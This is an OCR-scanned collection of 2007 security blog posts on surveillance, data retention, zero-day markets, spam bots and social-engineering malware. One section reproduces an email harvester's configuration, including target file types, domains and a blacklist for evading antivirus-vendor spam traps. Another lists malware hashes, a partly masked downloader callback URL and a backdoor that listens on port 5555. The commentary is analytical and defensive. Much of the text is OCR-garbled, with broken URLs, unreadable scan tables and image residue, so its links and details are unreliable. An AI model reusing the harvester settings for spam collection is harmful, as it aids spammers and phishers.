as agency records. Therefore, the agreement states, the material is not subject to public 
disclosure under the Freedom of Information Act. 


In the past, Secret Service logs have revealed the comings and goings of various White House 
visitors, including Monica Lewinsky during the Clinton administration." 


| thought that’s always been the case anyway, but it closes a loophole that could result in 
potentially embarrassing future developments - or less accountability. Time will show. [2]More 
info. 


1. http://www.chron.com/disp/story.mpl/politics/4450956.htm 
2. http: //www.firstamendmentcenter.org/news.aspx?id=17981 


3.1.8 Russia’s Lawful Interception of Internet Communications (2007-01-08 21:54) 


Don’t fool yourself, they’ve [1]been doing it for the time being, now they’re legalizing it - 
working for anything like the EFF in Russia means having the bugs in your place bugged. 
[2]Citing Cyber-Terrorism Threat, Russia Explores Internet Controls : 


"An estimated 20 percent of the Russian population now has access to the Internet. Whereas 
the Putin administration exerts tight control over the major domestic broadcast and print 
media, it does not currently restrict the content of Internet sites on a wide scale. Web sites 
such as Gazeta.ru and Lenta.ru provide many of the articles and commentary that would 
normally otherwise appear in an opposition press. Several wealthy Russians living in political 
exile, including Boris Berezovsky and Vladimir Gusinsky, own Russian-language websites that 
publicize their anti-Putin views to Russian audiences. In August 2006, Russian right-wing 
extremists used the Internet to coordinate a bomb attack against illegal migrants from Asia." 


Give me an excuse for [3]data retention? No, give me another one besides the infa- 
mous "if you don’t have anything to hide then why worry"? We all have things to hide, and 
things we don’t want others to know, that’s still called my privacy, and since when does this 
became a terrorist activity, or someone’s just piggybacking on the overall paranoia created 
by the thought to be acting as government watchdog, media - don’t be a reporter, be a 
journalist! Winning the public support in different countries largely relies on the local attitudes 
towards the key buzzwords - terrorists are using the Net as a "safe heaven", and child 
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pornographers are operating online, while people are unemployed and primitive deceases 
which should been dealth with years are a second economic priority, next to your first one - 
fighting your (political campaign) demons, or the (upcoming budget allocation) demons you 
put so much efforts into making me believe in. Start from the basics, why retain everyone’s 
data, and intercept everyone’s communications while forgetting that information is all about 
interpretation? How come you’re assuming - if you’re even considering it - that such a neatly 
centralized databases of private information would be protected from insiders, even outsiders 
which will inevitably be tempted to having access to such a database? A country’s intelligence 
is the government’s tool for protecting the national security or beyond, but over-empowering 
the watchers is so shortsighted, you’d better break through your black’n’white world only and 
start considering all other colours as equal. Don’t slip on your values. 


If you sacrifice privacy for security, you don’t deserve both of them, and the utopian 
idea of having a 100 % successful law enforcement as the panacea of dealing of crime reminds 
of a quote | recently find myself repeating very often - make sure [4]what you wish for, so it 
[5]doesn’t actually happen. 


1. http: //adanchev,blogapot.con/2006/04/catching-up-on-how-to-Tawfully_ 82. kta 
2. http: //worldpoliticswatch.com/article.aspx?id=416 

3, http://www. dataretent ionisnosclution.con/ 

4. http: //en.wikipedia. org/wiki/Thought crime 


5. http: //en.wikipedia.org/wiki/Nineteen_Eighty-Fou 


3.1.9 Iran Bans Purchase of Foreign Satellite Data (2007-01-08 22:53) 


[1]Re-inventing the wheel : 


"According to the bill, a copy of which has been sent to all ministries, organizations, state and 
revolutionary institutions, the purchase of information from foreign sources is deemed against 
the law. Specialists of the Defense Ministry have currently succeeded in initiating a project for 
obtaining satellite information online. For the first time in Iran, it is now possible to produce 
topographic maps, on a scale of 1/10,000, of a specific area for municipal and developmental 
projects, with the satellite images of very high resolution." 


Guess they don’t want others to know which locations of their country are still unknown 
to themselves, but with the bill definitely implemented as a national security measure, and 
to improve the nation’s self-esteem, drop a line if they ever get close to producing such 
[2]high-resolution image of their [3]Natanz facility on their own. 
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1. http://english.farsnews.com/newstext . php?nn=8510170172 
2. http://www.ceip.org/files/projects/npp/resources/images/iran/natanz. JP 


3. http: //www.isis-online.org/images/iran/iran_image_index.htm 


3.1.10 Insider Sentiments around L.A’s Traffic Light System (2007-01-10 00:03) 


Rember how the [1]Hollywood Hackers were winning time while heading straight to Grand 
Central Station in NYC to outsmart the Plague’s plan to cause a worldwide ecological disaster 
and cash in between? In pretty much the same fashion - without the randomization of traffic 
lights - [2]two engineers in between their union’s strike seems to have watched the movie too: 


"They didn’t shut the lights off, city transportation sources said. Rather, the engineers 
allegedly programmed them so that red lights would be extremely long on the most congested 
approaches to the intersections, causing gridlock for several days starting Aug. 21, they said." 


Whether overal paranoia due to the sensitive nature of the workers’ positions and the 
publicly stated intentions, insider sentiments prevail from my point of view. 


1. http://www. imdb.com/Title?011324 


2. http: //www.latimes.com/news/local/la-me-trafficlights9jan09, 0,7005703.story?coll=la-home-loca 
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3.1.11 Data Mining Credit Cards for Child Porn Purchases (2007-01-10 00:14) 


State of the Union 
by Carl Moore 


If Google, Microsoft and Yahoo Existed In 1939 


THE NAMES AND ADDRESSES OF 


ALL THE JEWS IN GERMANY ? 
YOU'RE THE LAW, SIR. YOU'VE 
GOT If- 


Gl Milage coun 


Copyright © 2006 Creators Syndicate, Inc. 


22 million customers had the [1]privacy of their credit card purchasing histories breached for 
the sake of coming up with 322 suspects while looking for transactions to a single child porn 
web site - ingenious, absolutely ingenious : 


"In the case under investigation, police were aware of a child pornography Web site out- 
side of Germany that was attracting users inside the country. And they asked the credit-card 
companies to conduct a database search narrowed to three criteria: a specific amount of 
money, a specific time period and a specific receiver account." 


| don’t want to ruin the effect of the effort here, but why do you still believe child porn 
is located on the WWW, in the http:// field you’re so obsessed with? Is the WWW the only 
content distribution vector for multimedia files you’re aware of? Try the [2]lnternet Relay 
Chat, the concept of Fserve to be precise. Having found the low lifes who buy child porn over 
the Web is like picturing a pothead as the Uber-dealer to meet your quotas, namely, efforts 
like these have absolutely no effect on the overal [3]state of child pornography online. It’s 
the wrong way to fight the war. Put the emphasis on fighting the very production process - 
trafficking of children - not the distribution one. 


1. http://yro.slashdot.org/article.pl?sid=07/01/09/1833244 
2. http: //www.usenet-replayer.com/faq/uk.legal.htm 
3. http: //www.redbarnet .dk/Files/Filer/Rapporter/Position_paper_2004.pdf 


3.1.12 Still Living in the Perimeter Defense World (2007-01-10 00:19) 


Whereas you'd better break out of the [1]budget-allocation myopia and consider [2 ]prioritizing 
your security investments, [3]decreased spending on information security in certain regions 
means good old-fashioned malware and spam floods for the rest of regions doing it : 


"Fewer small- and medium-sized enterprises (SMEs) in Taiwan will increase their spend- 
ing on information security this year compared with last year, according to a report released 
Thursday by the Institute for Information Industry’s Market Intelligence Center (MIC). The 
report said that only 12.9 percent of SMEs will increase their information security spending in 
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2007, compared with 16.2 percent in 2006." 


Perimeter defense and host security is like the ABC of security, but since viruses and 
network attacks are "taken care of" all seems fine - you wish. 


"While more than 90 percent of SMEs have installed anti-virus software and firewall de- 
vices, only 11 percent have installed unified threat management products, according to 
Wang." 


And while your organization is multitasking on how to budget with the anyway scarce re- 
sources due to legal requirements to do so, or visionary leaders realizing the soft and hard 
cash losses if you dare to pretend your organization wouldn’t get breached into, regions 
around the world don’t have the incentives to do so. If you bring too many people to a party 
someone always takes a *** in the beer, or so they say. Know when to spend, how much, on 
what, and is the timing for your investment the right one given the environmental factors of 
your company. A small size business doesn’t really need a honeyfarm unless of course the 
admin is putting a personal effort in the job. 


1. http: //ddanchev. blogspot .com/2006/07/budget-allocation-myopia-and. htm 


2. http: //ddanchev. blogspot . com/2006/05/valuing-security-and-prioritizing-your.htm 


3. http://www.chinapost .com. tw/news/archives/business/200716/99290. ht 


3.1.13 Eyes in London’s Sky - Surveillance Poster (2007-01-10 14:08) 


Alcohol’s bad, drugs are bad, [1]surveillance is good for protecting your from the insecurities 
we made you become paranoid of, and so are [2]head-mounted surveillance cams equipped 
police officers. Sure, but consider the [3]social implications too. London may be one of the 
most important business centers in Europe - next to Frankfurt and Rotterdam - but I’m so not 
looking forward to living in what’s turning into a [4]synonym for 1984. 


1. http://www. signs-of-the-times.org/signs/pods/watchful_eyes. jpg 


2. http: //ddanchev. blogspot. com/2006/11/londons-police-experiment ing-with-head.htm 


3. http: //www.surveillance-and-society.org/ 
4. http://photos1.blogger .com/x/blogger2/4099/2257/1600/57984/phr2005spread. jpg 


3.1.14 Preventing a Massive al-Qaeda Cyber Attack (2007-01-10 14:59) 


From the [1]unpragmatic department : 


"Colarik proposes "a league of cyber communities." The world’s 20 largest economies 
would sign a treaty vowing to manage their own country’s cyber activities. Member states 
would then deny traffic to any nation that refuses to crack down on cyber terrorists." 


No, he really means it, totally forgetting on how a huge percentage of [2]terrorist related web 
sites are hosted in the U.S. Here’s the [3]latest example. It gets even more shortsighted : 


"Al-Qaeda also publishes a monthly magazine devoted to cyber-terrorism techniques." 
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If installing a VMware and PGP Whole Disk Encryption is a [4]cyber-terrorism technique, 
we’re all cyber terrorists without the radical mode of thinking and the Quran on the bookshelf. 


1. http: //www.cbn.com/CBNnews/84460. aspx 
2. http://www. haganah.org.il/harchives/005680.htm 
3. http://www. haganah.org.il/harchives/005831 .htm 


4. http: //ddanchev. blogspot .com/2006/12/analysis-of-technical-mujahid-issue-one.htm 


3.1.15 It’s all About the Vision and the Courage to Execute it (2007-01-10 15:21) 


IP 


Great article on [1]China’s blogging market and the never-ending censorship saga. Meet Fang 
Xingdong, a banned journalist who decides to beat them by playing their own game, do the 
math yourself. While heading China’s Bokee with 14 million bloggers and more than 10,000 
new ones every day, he’s appointed only 10 people to monitor the blogs : 


"Of course, the authorities did not allow a completely wide-open system. Censorship is still 
practised, even at Mr. Fang’s company. Among his 80 employees are 10 people who comb 
through the blogs every day, deleting anything deemed to be obscene or politically unaccept- 
able. He hopes that the Chinese blogosphere will become self-regulating. "If it’s more orderly, 
there will be less pressure on us," he says. "I think a blog should have a basic foundation of 
morality and law. | compare it to a person’s home." 


If | were in China, I’d register on his network. 


1. http: //www.theglobeandmail.com/servlet/story/LAC.20070110.WATCHINGFANG10/TPStory/TPInternational/Asia/ 
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3.1.16 Transferring Sensitive Military Technology (2007-01-11 01:00) 


Iran's Artillery Rockets 
[aka Katyusha] 


Global +3 
Security.0Fg 


Fadyr-5 
333mm 
75 km 
90 kg 


[1]Busted : 


"China on Tuesday condemned US sanctions imposed last week on three Chinese com- 
panies for allegedly selling banned weapons to Iran and Syria, calling the accusations "totally 
groundless". "We strongly oppose this and demand the US side correct this erroneous action," 
foreign ministry spokesman Liu Jianchao said at a regular press conference. The Chinese firms 
are among 24 foreign entities from several countries hit with the sanctions, invoked under the 
2005 Iran and Syria Nonproliferation Act." 


Follow the connection, the U.S is doing business with the Chinese companies, who leak 
it to Iran and Syria, who leak it [2]Hezbollah or [3]pretty much everyone at the bottom of the 
food chain. 
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More comments - "[4]Foreign Intelligence Services and U.S Technology Espionage" and 
"[5]Hezbollah’s use of Unmanned Aerial Vehicles - UAVs". 


Artillery Rockets image courtesy of [6]Globalsecurity.org 


1. http: //www.spacewar.com/reports/China_Condemns_US_Sanctions_On_Three_Firms_999.htm 


2. http://www.defenseindustrydaily .com/2005/04/hezbollah-mirsad1-uav-penetrates-israeli-air-defenses/index.p 


ee Te 

4. http: //ddanchev. blogspot .com/2007/01/foreign-intelligence-services-and-us.htm 
5. http: //ddanchev. blogspot . com/2006/09/hezbollahs-use-of-unmanned- aerial. htm1 
6. http: //globalsecurity .org/ 


3.1.17 Head Mounted Surveillance System (2007-01-11 01:32) 


With the LED 


[1]It’s so cheap and [2]Jaffordable even you can add it to your wish list : 


"The new DV ProFusion is a cost effective alternative to the DV Pro. It is a lightweight, 
mobile, body worn video and audio solution. DV ProFusion has a built in screen allowing for 
live viewing and instant playback. DV ProFusion is available in either 30GB hard drive 
capacity, which provides up to 100 hours of video or 100GB offering 450 hours of 
video, depending on sampling bit rate. DV ProFusion enables the user to keep both hands 
free whilst recording exactly what they see and hear themselves. DV ProFusion is specifically 
designed to work with a number of optional accessories, including an extendable pole and 
additional lens options." 


While it’s very [3]linnovative idea, in five years the current models would look like the 
brick-size like Motorola cell phones you all know. | like the idea of storing the footage in the 
device compared to relying via air which makes me think of several scenarios for possible 
abuse or DoS attacks. In case you haven’t heard [4]public CCTV cameras are getting a boost 
with built-in speakers, so perhaps at a later stage it would come to someone’s mind to include 
a speaker on the other side of the head too. Two [5]clips to see it in [6]Jaction. 


http: //www.doublevisionsystems.com/ 
ttp://www.doublevisionsystems.com/prices.htm 


ttp://ddanchev. blogspot .com/2006/11/londons-police-experimenting-with-head. htm 


1. 

2. 

3. 

4 
5. ; 

6. 


http: //www.doublevisionsystems.com/loftsearch.mo 
ttp://www.doublevisionsystems.com/light_test.mo 
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3.1.18 Security Lifestyle(S) (2007-01-13 18:30) 


If [1]Security is a state of mind, then so is brand loyalty. 


1. http://www.worldaidsday.org/default.asp 


3.1.19 The Life of a Security Threat (2007-01-15 20:40) 


[1] 
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€ “a 
-c: oo: : . : 
VeriSign: 01:44:12 MONDay - JULY 24, 2006 
LOCATION: GUANGZHOU 


Eye-catching streaming video courtesy of [2]iDefense. In the past, iDefense got a lot of 
publicity due to their outstanding [3]cyber intelligence capabilities, and quality reports among 
which my favorite is the one providing a complete coverage of the [4]China vs U.S cyberwar 
due to the [5]captured AWACS in case you remember. VeriSign, perhaps the last vendor you 
would think of, purchased the company with the idea to diversify its portfolio of services and 
further expand their market propositions, if critical infrastructure is what they manage, an IDS 
signature when there’s no patch available and wouldn’t be not even next [6]Patch Tuesday, is 
invaluable and proactive approach for protecting a company’s assets. Recently, [7]iDefense 
offered another bounty on zero day vulnerabilities in Vista and IE7, but considering that 
Windows Vista is still not adopted on a large corporate and end user scale the way XP is, 
therefore a zero day exploit for Windows XP must have a higher valuation then a Windows 
Vista one. Proving Vista is insecure and iDefense taking the credit for it though, is a strategic 
business move rather then a move aiming to improve the overal security of their customers - 
if only could iDefense purchase all the exploits from Month of the X Bugs initiatives. Moreover, 
a [8]Vista zero day exploit was available for sale. Feel the hypo-meter about to explode. Think 
malicious attackers. Would someone pay $50,000 for an exploit of an OS whose adoption by 
corporate and home users is continuing to sparkle debates, while an IE6 zero days are offered 
in between $1000-2000? 


In the time of blogging, there’re numerous [9]zero day vulnerabilities for sale out there, 
the way this [10]commercialization of vulnerability research directly created the - thankfully - 
stil not centralized [11]underground market for vulnerabilities by adding more value to what’s 
[12]a commodity from my point of view. Here’s a complete coverage on [13]how the WMF 
vulnerability got purchased for $4000 in case you want to deepen your knowledge into the 
topic. 


fiepi/ abe ‘defense. con/#ilee/video/loat/loat _SeaKbpe wa 
| http://labs defense. con/ 
. http: //ddanchev. blogspot . com/2006/09/cyber—intelligence-cyberint .html 
| http://adanchey blogspot .con/2006/06 /chinese-hackers-attacking-us. hin 
_ het: //adanchev blogspot. con/2006/02/nacktivisn- tensions hea 

| http://awy. windowsitpro. con/rtacle/ArticleID/46065/46065.html7Ad-l 


. http://www. eweek.com/article2/0, 1895, 2073611,00.asp 
. http: //ddanchev. blogspot .com/2006/03/wheres-my-Oday-please .htm 


ttp://ddanchev. blogspot .com/2005/12/0bay-how-realistic-is-market-for.htm 


12. http://ddanchev. blogspot .com/2006/05/delaying-yesterdays-Oday-security.htm 
13. http://ddanchev. blogspot .com/2006/01/was-wmf-vulnerability-purchased-for.htm 


3.1.20 Inside an Email Harvester’s Configuration File (2007-01-17 13:55) 


In previous posts on [1]web application email harvesting, and the [2]distributed email harvest- 
ing honeypot, | commented on a relatively less popular threat - the foundation for sending 
spam and phishing emails, namely collecting publicly available email addresses. The other 
day I came across an email harvester and decided to comment on its configuration file. 


Type of file extensions to look in : 
TargetFile=abc;abd;abx;adb;ade;adp;adr;bak;bas;cfg;cgi;cls; 
cms;csv;ctl;dbx;dhtm;dsp; 
dsw;eml;fdb;frm;hlp;imb;imh;imh;imm;inbox;ldb;ldif;mbx; 
mda;mdb;mde;mdw; 
mdx;mht;mmf;msg;nab;nch;nfo;nsf;nws;ods;oft;pmr;pp;ppt; 
pst;rtf;slk;sIn;sql;stm;tbb;tbi;txt;uin;vap;vcf;myd;html;htm;htt;js; 
asm;asp;c;cpp;h;doc;ini;jsp;log;mes;php;phtm;pl; 
shtml;vbs;xhtml;xls;xml;xml;wsh; 


Domains to look in : 
TargetDomain=ru;com;net;cz;in;info;uk;fr;by;edu;it;de;ua;pl;nz;am;tv; 


As you can see, this one is Europe centric. 


Blacklisted usernames and domains : 
BlackList=root;info;samples;postmaster;webmaster;noone;nobody; 
nothing;anyone;someone;your; you;me;bugs; 
rating;site;contact;soft;somebody;privacy;service;help;submit;feste; 
gold-certs;the.bat;page;admin;support;ntivi; unix;bsd;linux;listserv;certific; 
google;accoun;spm;spam;www;secur;abuse; 
.mil;.ftn;@hotmail;@msn;@microsoft;rating@;f-secur;news;update; .gov;@fido;anyone@;bug- 
s@;contract@;feste;gold-certs@;help@;info@;nobody@;noon e@;kasp;sopho; @foo; 
@iana;free-av;@messagelab;winzip;winrar;samples;abuse;pa nda;cafee; 
spam;pgp;@avp.;noreply;local;root@;postmaster@; 
.fidonet;subscribe;faq;@mtu;.mtu;.mgn;.plesk;.sbor;.port;.hoster; 
@novgorod;@quarta;.nsk;.talk;.tomsknet; 
@suct;.lan;.uni-bielefeld;@ruddy;.msk;@individual;.interdon; 

@php;@zend; feedback;.lg;.Inx;@hostel; @relay; 

-neolocation; @example;.kirov;.z2;.fido;.tula; 

@intercom;@olli;@ozon; @bk;@lipetsk;@ygh; 
.eltex;.invention;.intech;@cityline;.kiev;@4ax; 

ssenergy;@mail.gmail;@butovo; 


F-Secure, Kaspersky, MessageLabs, Panda Software and McAfee are taken into consider- 


ation, but the best part is that the vendors themselves are visionary enought not to be using 
domains or email addresses associated with them, for spam and malware traps. 
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Thankfully, there’re many spam poison projects where these crawlers get directed to a 
huge number of randomly generated email addresses. And while the results are evident, 
namely they’re picking them up and poisoning their databases with non-existent emails it 
is questionable if that’s the best way to fight spam, since the spammers are going to send 
their message to anyone, even to the non-existent email addresses causing network load. 
Something else worth mentioning, these email harvesters are starting to pick up [at] and [dot] 
type of obfuscation too. 


Here are some more [3]comments on the Spamonomics | recently made. Spammer’s at- 
titude has to do with "Busyness vs Business" factor of productivity mostly, their business 
model is broken, but they just keep on sending them without knowing it. 


1. http: //ddanchev. blogspot .com/2006/06/web-application-email-harvesting-worm.htm 


2. http: //ddanchev. blogspot .com/2006/09/email-spam-harvesting-statistics.htm 
3. http: //radar.oreilly.com/archives/2007/01/spamonomics_101.htm 


3.1.21 Collected in the Wild (2007-01-17 14:58) 


Antivirus Version Update |Result 

Antivir 3.0. 01.16.2007 f 

4uthentium 93, 01.16.2007 Possibly anew variant of W32/new-malware! Maximus 

Avast hi d 01.16.2007 jnc c 

AVG 01.16.2007 inc 

BitDefender : 01.17.2007 }nc 

CAT-QuickHeal 

ClamAV 

DrWweb ; ound 

eSafe 0.14. 16. Caspidious Trojan/worm 

eTrust-InoculateIT fount 

eTrust-Vet +15; 10 vir 

Ewido : 01.16.2007 }n rl und 

Fortinet 82.0, 01.16.2007 |suspicious 

F-Prot ; 01.16.2007 |Possibly a new variant of W32/new-malware! Maximus 

F-Prot4 ele 01.16.2007 |\W32/new-malware!Maximus 

Ikarus 1.0. 01.09.2007 In rus found 

Kaspersky 0.2. 01.17.2007 

McAfee 

Microsoft 

NOD32v2 

Norman 

Panda 

Prevxl 

Sophos 

Sunbelt 

TheHacker 

UNA 

VBA32 lb 

VirusBuster 3.19: O1. 16. ‘2007 novirus: necked FSG 
Nothing special, looks like a downloader, tries to connect to 


***** Cc/getcommand.php?addtodb=1 &uid=rtrtrele.CurrentU. to get the payload 
that’s packed and repacked quite often. File length: 2829 bytes. MD5 hash: 
2147eb874fefe4e6a90b6ea56e4d629a. 
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Antivirus 

Antivir 3.0, 01.16.2007 |HEUR/Malware 
4uthentium 93. 01.16.2007 |no vir fount 

Avast vi i 01.16.2007 virus found 

AVG 01.16.2007 |no virus found 
BitDefender : 01.17.2007 [no virus found 
CAT-QuickHeal 9.00 01.16.2007 |(Suspicious) - ONAScan 
Clamay devel-20060426 01.16.2007 |no virus found 

DrWeb Bc} 01.16.2007 |Trojan.DownLoader.17532 
eSafe 0.14. 01.16.2007 firus fount 
eTrust-InoculatelT 73. 01.16.2007 virus four 

eTrust-Vet ial 01.15.2007 [no vir found 

Ewido i 01.16.2007 |BackdoorAgent.ajz 
Fortinet 82.0. 01.16.2007 |W32/4gent.AJZ!tr.bdr 
F-Prot ; 01.16.2007 |no virus found 

F-Prot4 peaks 01.16.2007 j|no virus found 

Ikarus 1.0. 01.09.2007 |no virus founc 

Kaspersky 0.2, 01.17.2007 |Backdoor.Win32.Agent.ajz 
McAfee 01.16.2007 O VIT found 

Microsoft d 01.17.2007 [no virus found 

NOD32v2 01.16.2007 |probably unknown NewHeur_PE virus 
Norman 80. 01.16.2007 |no v fount 

Panda 0.0, 01.16.2007 |Suspicious file 

Prevxl 01.17.2007 |no virus found 

Sophos Ai be 01.16.2007 

Sunbelt seh i 01.12.2007 |no virus found 

TheHacker 0.3. 01.14.2007 |no virus found 

UNA, d 01.16.2007 |no virus found 

VBA32 By ie Ie 01.16.2007 |Backdoor.Win32.Agent.ajz 
VirusBuster 3.19: 01.16.2007 [no virus found 


The next one is rather more interesting as it’s a registry backdoor, creating a new 
service and opening up a listening port 5555. File length: 21504 bytes. MD5 hash: 
406e3fc8a2f298a151890b3bee9d7b18. 


Creates service "msntupd (msntupd)" as "C:\WINDOWS\SYSTEM32\regbd.sys". 


3.1.22 Social Engineering and Malware (2007-01-23 20:07) 


With all the buzz over the "Storm Worm" - [1]here’s a frontal PR attack among vendors - it 
is almost unbelievable how hungry for a ground breaking event, the mainstream media is. 
And it’s not even a worm. If you are to report each and every outbreak not differentiating 
itself even with a byte from previous "event-based" malware attacks, what follows is a flood 
of biased speculations - too much unnecessary attention to current trends and no attention 
to emerging ones. With pre-defined subjects, static file names, one level based propagation 
vector, with the need for the end user to OPEN AN .EXE ATTACHMENT FROM AN UNKNOWN 
SOURCE, and with "the" Full Movie.exe in 35kb, worldwide scale attacks such as the ones 
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described [2]here, are more of a PR strategy - malware with multiple propagation vectors 
has the longest lifecycle, as by diversifying it’s improving its chances of penetration. Don’t 
misunderstand me, protecting the end user from himself is a necessity, but overhyping 
this simple malware doesn’t really impress anyone with a decent honeyfarm out there. It 
doesn’t really matter how aggressively it’s getting soamed, what matters the ease to filter 
and enjoying the effective rules you’ve applied. No signatures needed. As a matter of fact | 
haven’t seen a corporate email environment that’s allowing incoming executable files in years, 
especially anything in between 0-50kb, have you? My point is that, the end user seems to 
be the target for this attack, since from an attacker’s perspective, you have a higher chance 
of success if you try to infect someone who doesn’t really know whether his AV is running, 
or cannot recall [3]the last time an update was done to at least mitigate the risk of infection. 
These are the real Spam Kings. 


At the beginning of 2006, | discussed the evolving concept of [4]localizing malware attacks : 


"By localization of malware, | mean social engineering attacks, use of spelling and grammar 
free native language catches, IP Geolocation, in both when it comes to future or current seg- 
mented attacks/reports on a national, or city level. We are already seeing localization of phish- 
ing and have been seeing it in soam for quite some time as well. The “best” phish attack to be 
achieved in that case would be, to timely respond on a nation-wide event/disaster in the most 
localized way as possible. If | were to also include intellectual property theft on such level, it 
would be too paranoid to mention, still relevant | think. Abusing the momentum and localizing 
the attack to target specific users only, would improve its authenticity. For instance, I’ve come 
across harvested emails for sale segmented not only on cities in the country involved, but 
on specific industries as well, that could prove invaluable to a malicious attack, given today’s 
growth in more targeted attacks, compared to mass ones." 


The current "events-based" malware is a good example here. If it were a piece of malware to au- 
tomatically exploit the targeted PC, then you really have a problem to worry about. Meanwhile, 
Businessweek is running an interesting article on [5]Why Antivirus Technology Is Ineffective, 
and stating "white-listing” is the future of malware prevention. Could be, if there wasn’t ways 
to bypass the white-listing technology, or give a "white-listed" application a Second Life - and 
of course there are. 


Reward Examples 
Threat Enactment* “lll carry out threat X on Y. and you can watch!” 
Privacy Invasion* “You can browse X's hard drive” 

“You can read X’s email archive” 

“You can watch X’s webcam/mic” 
Revelation* “T'll tell vou what X said to Y” 

“T'll tell vou what I found on X’s hard drive” 
Fabrication* “You can forge emails from X” 
Mischief* “You can seize control of X’s PC” 
Virtual goods “You'll get tons of free porn” 

“You'll get free software” 
Real-world Loot ls* “You'll get free LOOK ls to your door” 
Innovation “You can use this really cool feature” 


Unsubstantiated “You'll get seven years good luck” 
“Your true love will return to you” 


Figure 2: Taxonomy of rewards (* marks cross-party rewards) 
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In another piece of [6]quality research written by Mike Bond and George Danezis, the authors 
take us through the temptation stage, monitoring, blackmail, voluntary propagation, involun- 
tary propagation, and present nice taxonomies of rewards and blackmail. 


And if you're still looking for fancy stats and data to go through, read this surprisingly well 
written paper by Microsoft - [7]Behavioural Modelling of Social Engineering-Based Malicious 
Software. They’ve managed to spot the most popular patterns - generic conversation, non- 
english language used, virus alert/software patch required, malware found on your computer, 
no malware found, account information, mail delivery error, physical attraction, accusatory, 
current events, and free stuff. 


r 


kD Con Gy DR MEA i —— a 
wee, 4 

(HS I Ap 

“y 

is 


THAT VIRUS IS GOING 
ve TITLED IT “WORLD HUNGER’? 
YOU GOTTA TITLE YOUR 
INGECTED E-MAILS SOMETHIN’ 
PEOPLE WILL, LIKE, ACTUALLY 
OPEN, LIKE 


if ¥ 


Current events, free stuff, and malware on your computer are the most effective ones from 
my point of view as they all exploit wise psychological tactics. Current events because the 
Internet is a major news source and has always been, free stuff, due the myth of "free stuff" on 
the Internet, and the found malware putting the (gullible) end user in a "oops it was my turn 
to get a nasty virus" state of mind. 


. http://www.watchguard.com/RSS/showarticle.aspx?pack=RSS .Storm.worm 


ttp://www.computerworld.com/action/article.do?command=viewArticleBasickarticleId=9008818 


ttp://ddanchev.blogspot.com/2006/07/anti-virus-signatures-update-it-could. htm 


. http://www. packetstormsecurity.org/papers/general/malware-trends .pdf 
. http://www. businessweek.com/technology/content/jan2007/tc20070122_300717 .htm 
. http: //www.cl.cam.ac.uk/techreports/UCAM-CL-TR- 666. pdf 


http: //www.microsoft .com/downloads/details .aspx?FamilyID=e0f 27260-58da-40db-8785-689cf6a05c73kdisplaylang 


if 
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3.1.23 Attack of the SEO Bots on the .EDU Domain (2007-01-23 20:59) 


A university’s Internet presence often results in very high pageranks for their site, therefore, if 
a malicious spammer would like to harness the possibilities of having the soammed message 
appear among the top 20 search results, he’d figure out a way to post direct http:// links on 
various .edu domains, especially on the wikis residing there. That’s the case with PuppetID : 
Matias Colins - of course collins is spelled with one L only -. Matias Colins is an automated 
attack script that’s already hosting hundreds of [1]spam pages on the [2].edu domain, 
mostly adult related, and it’s worth mentioning that where access to a directory has been in 
place, the hosted pages blocked caching from any search engine, or hosted one on its own. 
Redirection is perhaps what the attacker is very interested in too. See how this berkeley.edu 
link - dream.sims.berkeley.edu/ tdennis/wp-content/animalsex.php - redirects to a site for 
whatever the page title says, and this is yet another one - oit.pdx.edu/jethrotest/mysqldb.php. 


Here are two more examples of [3]another bot using my blog post titles to generate subdo- 
mains or the like, and of bots [4]Jabusing Ebay’s reputation system by self-recommending 
themselves. 


http: //www.google.com/search?as_q=hentai+freetpictureskhl=ennum=100&btnG=Google+Search&as_epq=&as_oq=kas 


eq=&lr=kas_ft=ikas_filetype=kas_qdr=all&as_nlo=&as_nhi 


3.1.24 The Zero Day Vulnerabilities Cash Bubble (2007-01-25 17:29) 


The [1]WMF was reportedly sold for $4000, a [2]Vista zero day was available for sale at $50,000, 
and now [3]private vulnerability brokers claim that they beat both the underground and the 
current incentive programs, while selling vulnerabilities in between $75,000 - $120,000. 


"The co-founder of security group Secure Network Operations Software (SNOSoft), De- 
sautels has claimed to have brokered a number of deals between researchers and private 
firms-as well as the odd government agency-for information on critical flaws in software. Last 
week, he bluntly told members of SecurityFocus’s BugTraq mailing list and the Full-Disclosure 
mailing list that he could sell significant flaw research, in many cases, for more than $75,000. 
"I’ve seen these exploits sell for as much as $120,000," Desautels told SecurityFocus in an 
online interview." 


But the cash bubble is rather interesting. Zero day vulnerabilities are an over-hyped 
commodity and paying to get yourself protected from one, means you'll be still exposed to 
the next one while you could have been dealing with far more risky aspects of protecting your 
network, or customers. The (legitimate) business model breaks when every vendor starts 
offering a "bounty" for vulnerabilities while disintermediating the current infomediaries. It 
would be definitely more cost-effective for them, than improving someone’s profit margins. Or 
they could really reboot their position in this situation by applying some [4]fuzz logic on their 
own software at the first place. 


1. http://it.slashdot.org/article.p1?sid=06/02/02/215210 
2. http://it.slashdot.org/article.pl?sid=06/12/16/19621 

3. http://www.securityfocus.com/news/1143 
4. 


ttp://en.wikipedia.org/wiki/Fuzz_testing 


3.1.25 Who’s Who on Information and Network Security in Europe (2007-01-25 17:36) 


A very [1]handy summary of Europe’s infosec entities and contact details that come as a 
roadmap for possible partnerships or analyst’s research : 


"This Directory serves as the “Yellow pages” of Network and Information Security in Eu- 
rope. As such, it is a powerful tool in everyday life of all European stakeholders and actors 
in Network and Information Security (NIS). By having access to all contact data and entry 
points for all European actors in one booklet, available on your desk, the “arm length’s rule” 
of access to information is becoming concrete. | am confident that this device of compiled 
Network and Information Security stakeholders, contacts, websites, areas of responsibil- 
ity/activity of national and European Authorities, including organisations acting in Network 
Security and Information, serves our mission to enhance the NIS security levels in Europe well." 
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Compared to [2]China’s information security market on which I’ve blogged in a previous 
post, Europe’s R &D efforts are still largely de-centralized on a country level, but hopefully, 
with the ongoing initiatives among member states innovation will prevail over bureaucracy. 


1. http: //www.enisa.europa.eu/doc/pdf/deliverables/wiw_v2_2006. pdf 


2. http: //ddanchev. blogspot .com/2006/10/chinas- information-security-market .htm 


3.1.26 Threats of Using Outsourced Software (2007-01-25 17:57) 


[1]Self-efficiency in (quality) software programming for security reasons - yeah, sure: 


"The possibility that programmers might hide Trojan horses, trapdoors and other mal- 
ware inside the code they write is hardly a new concern. But the DSB will say in its report 
that three forces — the greater complexity of systems, their increased connectivity and 
the globalization of the software industry — have combined to make the malware threat 
increasingly acute for the DOD. "This is a very big deal," said Paul Strassmann, a professor at 
George Mason University in Fairfax, Va., and a former CIO at the Pentagon. "The fundamental 
issue is that one day, under conditions where we will badly need communications, we will 
have a denial of service and have billion-dollar weapons unable to function." 

